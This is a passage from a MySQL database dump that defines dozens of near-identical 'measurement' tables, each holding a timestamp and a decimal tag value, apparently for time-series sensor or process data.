/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement343` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement344`
--
DROP TABLE IF EXISTS `measurement344`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement344` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement345`
--
DROP TABLE IF EXISTS `measurement345`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement345` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement346`
--
DROP TABLE IF EXISTS `measurement346`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement346` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement347`
--
DROP TABLE IF EXISTS `measurement347`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement347` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement348`
--
DROP TABLE IF EXISTS `measurement348`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement348` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement349`
--
DROP TABLE IF EXISTS `measurement349`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement349` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement35`
--
DROP TABLE IF EXISTS `measurement35`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement35` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement350`
--
DROP TABLE IF EXISTS `measurement350`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement350` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement351`
--
DROP TABLE IF EXISTS `measurement351`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement351` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement352`
--
DROP TABLE IF EXISTS `measurement352`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement352` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement353`
--
DROP TABLE IF EXISTS `measurement353`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement353` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement354`
--
DROP TABLE IF EXISTS `measurement354`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement354` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement355`
--
DROP TABLE IF EXISTS `measurement355`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement355` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement356`
--
DROP TABLE IF EXISTS `measurement356`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement356` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement357`
--
DROP TABLE IF EXISTS `measurement357`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement357` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement358`
--
DROP TABLE IF EXISTS `measurement358`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement358` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement359`
--
DROP TABLE IF EXISTS `measurement359`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement359` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement36`
--
DROP TABLE IF EXISTS `measurement36`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement36` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement360`
--
DROP TABLE IF EXISTS `measurement360`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement360` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement361`
--
DROP TABLE IF EXISTS `measurement361`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement361` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement362`
--
DROP TABLE IF EXISTS `measurement362`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement362` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement363`
--
DROP TABLE IF EXISTS `measurement363`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement363` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement364`
--
DROP TABLE IF EXISTS `measurement364`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement364` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement365`
--
DROP TABLE IF EXISTS `measurement365`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement365` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement366`
--
DROP TABLE IF EXISTS `measurement366`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement366` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement367`
--
DROP TABLE IF EXISTS `measurement367`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement367` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement368`
--
DROP TABLE IF EXISTS `measurement368`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement368` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement369`
--
DROP TABLE IF EXISTS `measurement369`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement369` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement37`
--
DROP TABLE IF EXISTS `measurement37`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement37` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement370`
--
DROP TABLE IF EXISTS `measurement370`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement370` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement371`
--
DROP TABLE IF EXISTS `measurement371`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement371` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement372`
--
DROP TABLE IF EXISTS `measurement372`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement372` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement373`
--
DROP TABLE IF EXISTS `measurement373`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement373` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement374`
--
DROP TABLE IF EXISTS `measurement374`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement374` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement375`
--
DROP TABLE IF EXISTS `measurement375`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement375` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement376`
--
DROP TABLE IF EXISTS `measurement376`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement376` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement377`
--
DROP TABLE IF EXISTS `measurement377`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement377` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement378`
--
DROP TABLE IF EXISTS `measurement378`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement378` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement379`
--
DROP TABLE IF EXISTS `measurement379`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement379` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement38`
--
DROP TABLE IF EXISTS `measurement38`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement38` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement380`
--
DROP TABLE IF EXISTS `measurement380`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement380` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement381`
--
DROP TABLE IF EXISTS `measurement381`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement381` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement382`
--
DROP TABLE IF EXISTS `measurement382`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement382` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement383`
--
DROP TABLE IF EXISTS `measurement383`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement383` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement384`
--
DROP TABLE IF EXISTS `measurement384`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement384` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement385`
--
DROP TABLE IF EXISTS `measurement385`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement385` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement386`
--
DROP TABLE IF EXISTS `measurement386`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement386` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement387`
--
DROP TABLE IF EXISTS `measurement387`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement387` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement388`
--
DROP TABLE IF EXISTS `measurement388`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement388` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement389`
--
DROP TABLE IF EXISTS `measurement389`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement389` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement39`
--
DROP TABLE IF EXISTS `measurement39`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement39` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement390`
--
DROP TABLE IF EXISTS `measurement390`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement390` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement391`
--
DROP TABLE IF EXISTS `measurement391`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement391` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement392`
--
DROP TABLE IF EXISTS `measurement392`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement392` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement393`
--
DROP TABLE IF EXISTS `measurement393`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement393` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement394`
--
DROP TABLE IF EXISTS `measurement394`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement394` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement395`
--
DROP TABLE IF EXISTS `measurement395`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement395` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement396`
--
DROP TABLE IF EXISTS `measurement396`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement396` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement397`
--
DROP TABLE IF EXISTS `measurement397`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement397` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement398`
--
DROP TABLE IF EXISTS `measurement398`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement398` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement399`
--
DROP TABLE IF EXISTS `measurement399`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement399` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement4`
--
DROP TABLE IF EXISTS `measurement4`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement4` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
